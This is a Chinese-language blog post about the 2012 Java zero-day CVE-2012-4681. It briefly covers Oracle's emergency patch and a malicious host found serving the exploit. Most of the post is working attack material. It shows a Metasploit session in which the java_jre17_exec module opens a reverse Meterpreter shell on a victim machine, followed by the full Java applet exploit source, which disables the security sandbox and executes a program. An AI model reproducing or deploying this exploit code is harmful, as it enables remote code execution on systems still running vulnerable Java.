这次CVE-2012-4681最厉害的地方在于跨平台(咦, 这不正是Java的优点吗?)不管是哪一个平台哪一个浏览器都受到影响。
而且这次Oracle 终于破例在每季定期更新外提前推出更新修正CVE-2012-4681, CVE-2012-1682, CVE-2012-3136 跟 CVE-2012-0547。
而这次4681红的是ok.aa24.net 而 ok.aa24.net 也早就被列为危险名单。
如果不理警告坚持要看的话就像这样
接下来Tracert 一下就会发现IP居然是中华电信的,这算是台湾之光吗? XDD
对了 meterpreter
已经有攻击包了喔 XDD
- _ _
- / \ / \ __ _ __ /_/ __
- | |\ / | _____ \ \ ___ _____ | | / \ _ \ \
- | | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
- |_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
- |/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\
- =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
- + -- --=[ 996 exploits - 484 auxiliary - 148 post
- + -- --=[ 251 payloads - 27 encoders - 8 nops
- =[ svn r15451 updated 77 days ago (2012.06.11)
- Warning: This copy of the Metasploit Framework was last updated 77 days ago.
- We recommend that you update the framework at least every other day.
- For information on updating your copy of Metasploit, please see:
-
- msf > use exploit/multi/browser/java_jre17_exec
- msf exploit(java_jre17_exec) > exploit
- [*] Exploit running as background job.
- [*] Started reverse handler on 192.168.1.131:4444
- [*] Using URL:
- [*] Local IP:
- [*] Server started.
- msf exploit(java_jre17_exec) > [*] 192.168.1.132 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
- [*] 192.168.1.132 java_jre17_exec - Sending Applet.jar
- [*] 192.168.1.132 java_jre17_exec - Sending Applet.jar
- [*] Sending stage (30216 bytes) to 192.168.1.132
- [*] Meterpreter session 1 opened (192.168.1.131:4444 -> 192.168.1.132:1373) at Mon Aug 27 11:32:26 +0200 2012
- msf exploit(java_jre17_exec) > sessions -i 1
- [*] Starting interaction with 1...
- meterpreter > sysinfo
- OS : Windows XP 5.1 (x86)
- Computer : home-7f7a6a7e2e
- Meterpreter : java/java
- meterpreter >
- //
- // CVE-2012-XXXX Java 0day
- //
- // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
- //
- // secret host / ip : ok.aa24.net / 59.120.154.62
- //
- // regurgitated by jduck
- //
- // probably a metasploit module soon...
- //
- package cve2012xxxx;
- import java.applet.Applet;
- import java.awt.Graphics;
- import java.beans.Expression;
- import java.beans.Statement;
- import java.lang.reflect.Field;
- import java.net.URL;
- import java.security.*;
- import java.security.cert.Certificate;
- public class Gondvv extends Applet
- {
- public Gondvv()
- {
- }
- public void disableSecurity()
- throws Throwable
- {
- Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
- Permissions localPermissions = new Permissions();
- localPermissions.add(new AllPermission());
- ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
- AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
- localProtectionDomain
- });
- SetField(Statement.class, "acc", localStatement, localAccessControlContext);
- localStatement.execute();
- }
- private Class GetClass(String paramString)
- throws Throwable
- {
- Object arrayOfObject[] = new Object[1];
- arrayOfObject[0] = paramString;
- Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
- localExpression.execute();
- return (Class)localExpression.getValue();
- }
- private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
- throws Throwable
- {
- Object arrayOfObject[] = new Object[2];
- arrayOfObject[0] = paramClass;
- arrayOfObject[1] = paramString;
- Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
- localExpression.execute();
- ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
- }
- public void init()
- {
- try
- {
- disableSecurity();
- Process localProcess = null;
- localProcess = Runtime.getRuntime().exec("calc.exe");
- if(localProcess != null);
- localProcess.waitFor();
- }
- catch(Throwable localThrowable)
- {
- localThrowable.printStackTrace();
- }
- }
- public void paint(Graphics paramGraphics)
- {
- paramGraphics.drawString("Loading", 50, 25);
- }
- }
阅读(4318) | 评论(0) | 转发(0) |